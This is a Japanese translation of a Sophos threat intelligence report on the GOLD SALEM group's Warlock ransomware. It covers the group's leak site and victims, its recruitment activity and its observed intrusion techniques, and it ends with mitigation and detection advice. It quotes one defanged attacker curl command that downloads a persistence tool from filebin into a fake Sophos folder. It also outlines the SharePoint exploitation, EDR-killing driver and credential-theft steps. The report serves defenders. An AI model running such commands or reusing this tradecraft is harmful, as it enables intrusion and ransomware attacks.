攻撃グループ GOLD SALEM が展開する Warlock ランサムウェア

** 本記事は、GOLD SALEM’s Warlock operation joins busy ransomware landscape の翻訳です。最新の情報は英語記事をご覧ください。**

Counter Threat Unit™ (CTU) のリサーチャーは、Warlock Group と名乗る攻撃グループを監視しています。CTU のリサーチャーはこのグループを GOLD SALEM として追跡しています。このグループは、2025 年 3 月以降、ネットワークを侵害し、Warlock ランサムウェアを展開してきました。Microsoft はこの攻撃グループを Storm-2603 と名付け、「中国を拠点とする攻撃者である可能性が高い」と結論付けていますが、CTU のリサーチャーは攻撃の帰属を裏付けるのに十分な証拠は確認していません。

被害状況とオンライン活動

2025 年 9 月半ばまでにこのグループの標的となったのは 60 件であると公表されており、同時期の他のランサムウェア活動と比較すると平均程度の件数です。GOLD SALEM の標的は、小規模な企業や政府機関から北米、ヨーロッパ、南米に広がる大規模な多国籍企業まで多岐にわたります。ほとんどのランサムウェアグループと同様に、GOLD SALEM も潜在的な標的の多さにかかわらず、中国やロシアに位置する組織の侵害を避ける傾向がありました。しかし、9 月 8 日にこのグループはロシアを拠点とする組織の名前を、標的として専用の暴露サイトに投稿しました。この組織は電力業界にエンジニアリングサービスと設備を提供しています。ロシア連邦は、世界的なランサムウェア攻撃グループを多数抱えている一方で、国内や「近隣諸国」の組織を攻撃するグループを積極的に取り締まることで知られています。そのため、GOLD SALEM がロシアに位置する標的を掲載したことは、このグループがロシアの管轄外で活動している可能性を示唆しています。

2025 年 6 月、アンダーグラウンドフォーラム RAMP において GOLD SALEM を代表する人物が一般的な企業アプリケーション (Veeam、ESXi、SharePoint など) の脆弱性悪用コードや、EDR (エンドポイント検知・対応) システムおよびその他のセキュリティ製品を無効化するツールを募る投稿をするまで、その存在は確認されていませんでした。続く投稿において、同人物は潜在的な標的を見出すため、不正アクセス仲介人 (IAB:Initial Access Broker) との協力を呼びかけていました。このグループが自身の攻撃のためにアクセスを求めていたのか、RaaS(サービスとしてのランサムウェア) 活動のために加盟メンバー (Affiliate) を募集していたのか、あるいはその両方なのかは不明です。

GOLD SALEM は、標的の名前や窃取したデータを公開するため、Tor ベースの暴露サイトを運営しています (図 1 を参照)。2025 年 9 月 16 日現在、リストに掲載されている 60 件の標的のうち 19 件 (32%) のデータが暴露サイトに公開されていました。加えて、身代金の支払い拒否への対応としてか、攻撃者たちは 27 件 (45%) の標的から窃取したデータを第三者に販売したと主張しています。サイバー犯罪グループが窃取したデータを時折第三者に販売することは広く知られていますが、GOLD SALEM が公表した数字は誇張または捏造されている可能性が高いと考えられます。また、以前この暴露サイトに掲載されていた標的 3 件の情報が、その後削除されています。

図 1: 2025 年 9 月 16 日時点の GOLD SALEM の暴露サイト

GOLD SALEM は、別のランサムウェア攻撃によって侵害された標的の名前を投稿しています。まれではありますが、IAB が複数の攻撃者にアクセスを販売している、アフィリエイトが窃取したデータを複数のランサムウェア暴露サイトに投稿している、あるいは標的が共通の侵入経路を効果的に修復できずに繰り返し侵害されている、などの可能性が考えられます。たとえば、2025 年 6 月上旬に侵害されたとされる、米国を拠点とする建設業者は、2024 年 10 月に GOLD CRESCENT の Hunters International ランサムウェアの被害に遭った後、2025 年 6 月には Payout Kings の攻撃を受けました。

GOLD SALEM が公開したデータと暴露サイトから抽出されたメタデータから、このグループが 2025 年 3 月に標的への攻撃と脅迫を開始したことが示唆されます。6 月 10 日、RAMP フォーラムへの投稿で Warlock が公表され、同時に Tor ベースの暴露サイトへのリンクが公開されました。この Tor アドレスは 6 月 11 日に接続不能となり、新しいサイトは 7 月下旬まで登場しませんでした。GOLD SALEM は暴露サイトへの投稿を一括して行う傾向があり、実際の侵害から数日から数週間後に標的がリストに掲載されます。各標的の項目には、身代金支払いの期限を示す日付への「カウントダウン」が示されています (図 2 を参照)。この日付は通常、標的が暴露サイトに掲載されてから 12～14 日後でした。

図 2: 2025 年 9 月 16 日時点で GOLD SALEM の暴露サイトに掲載されていた「カウントダウン」の日付

観測されたインシデント

7 月下旬、CTU のリサーチャーたちは、侵入手法として SharePoint サーバーに対する ToolShell 脆弱性悪用チェーンが使用された GOLD SALEM のインシデントを分析しました。この脆弱性悪用チェーンは、CVE-2025-49704、CVE-2025-49706、CVE-2025-53770 および CVE-2025-53771 という脆弱性を組み合わせて悪用するものです。脆弱性悪用により ASPX Webshell が配信され、その結果 IIS ワーカープロセス (w3wp.exe) のコンテキスト内で cmd.exe のプロセスオブジェクトが作成されました。この手順により、攻撃者がリモートから任意のコマンドを実行し、その出力を受け取れるようになります。CTU のリサーチャーたちは、この Webshell を通じて以下のコマンドが実行されたのを確認しました。

curl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt

ダウンロードされた実行ファイルは Go 言語ベースの WebSockets サーバーであり、Webshell とは独立して侵害されたサーバーへの継続的なアクセスを可能にするものでした。CTU のリサーチャーはまた、GOLD SALEM が脆弱なデバイスの持ち込み (BYOVD:Bring Your Own Vulnerable Driver) と、googleApiUtil64.sys という名前に変更された脆弱な Baidu Antivirus ドライバを使用して EDR エージェントを終了させることで、EDR を回避していることも確認しました。このドライバの脆弱性 (CVE-2024-51324) は、任意のプロセスを終了させることを可能にします。

Microsoft によるこのグループのプロファイルには、実行された Mimikatz が「特に Local Security Authority Subsystem Service (LSASS) メモリを標的として、平文の認証情報を抽出していた」と記されています。Microsoft はまた、横展開に PsExec と Impacket が使用され、Warlock ペイロードの展開にグループポリシーオブジェクト (GPO) が使用されたことも観測しました。

8 月には、CTU のリサーチャーたちは、GOLD SALEM が正規のオープンソース DFIR (デジタルフォレンジックおよびインシデント対応) ツール Velociraptor を悪用して、侵害された環境内に Visual Studio Code のネットワークトンネルを確立していることを観測しました。これらのインシデントの一部では、Warlock ランサムウェアが実際に展開されました。

緩和策と検知

各組織は、定期的な攻撃対象領域の監視と、インターネットに接続したサービスに対する積極的なパッチ適用ポリシーを実施すべきです。ゼロデイ脆弱性の悪用の検知と緩和には、プロアクティブなエンドポイント監視と迅速なインシデント対応が必要です。

以下のソフォスの保護機能が、この脅威に関連する活動を検知します。

• Troj/WebShel-F
• Troj/Warlock-B

この脅威のリスクを軽減するため、CTU のリサーチャーは、表 1 のインディケーターを使用して、アクセスを精査および制限するための制御策を講じることを推奨しています。

表 1：今回の脅威のインディケーター